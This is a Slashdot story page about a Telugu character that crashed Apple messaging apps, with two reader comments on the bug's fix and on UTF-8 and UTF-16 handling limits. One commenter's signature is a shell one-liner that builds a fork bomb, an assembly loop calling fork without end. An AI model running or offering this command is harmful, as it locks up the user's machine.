Mac and iOS Bug Crashes Apps With a Single Indian-Language Character (mashable.com)

← Back to Stories (view on slashdot.org)

Mac and iOS Bug Crashes Apps With a Single Indian-Language Character (mashable.com)

Posted by msmash on Thursday February 15, 2018 @04:54AM from the watch-out dept.

A lone Indian-language character is crashing a number of messaging apps on iOS, users are reporting. The problem also extends to the Apple Watch and even Macs, all of which struggle to process the character specific to the Telugu language spoken in India.

2 of 114 comments (clear)

Min score:

Reason:

Sort:

Re:huh by Anubis+IV · 2018-02-15 06:14 · Score: 4, Informative

Ehh, the issue was fixed in the public betas before Mashable had even published their story about it.
For a better writeup, check out MacRumors' reporting on it (which was published prior to Mashable's). They mention that the bug was reported to Apple on Monday and was fixed at some point between then and now, so Apple has had a pretty quick turnaround on this one. Even so, it remains to be seen whether these fixes will be published in a minor update prior to their next intended release, or whether we'll have to wait for iOS 11.3 and macOS 10.13.4 before we get the fixes, which would likely be next month.
Meanwhile, Mashable's reporting is lagging. While they've found the time to update their article to indicate they finally managed to reproduce the issue, they apparently haven't had the time to update it with the fact that the bug was fixed before they ever wrote a word about it.
Re: A UTF8 processing failure? by Hal_Porter · 2018-02-15 06:52 · Score: 5, Informative

A lot of embedded systems will behave strangely if you feed them a lot of characters like this
https://en.wiktionary.org/wiki...
http://www.unicode.org/cgi-bin...
That character is four bytes in UTF-8 which kills systems that assume a maximum of three - which used to be true for Chinese and Japanese, but isn't now.
It's also two UTF-16 code points, which will mess up systems that assume each character is a single code point.
Now you'll say "Those systems are all buggy". That's true now, but it wasn't true when a lot of them were designed - Unicode used to be limited to 64K characters which meant it was a fixed width encoding for UCS-2. And that three bytes was the maximum encoding for UTF-8.
When it grew those ceased to be true. Which is fine for systems that are maintained - the vendor would find bugs created by the standard change and push an update. Unfortunately a lot of systems - particularly embedded ones - aren't like that. Hell, Android isn't like that. Google push updates out to vendors but if your machine is EOL you're SOL.

--
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;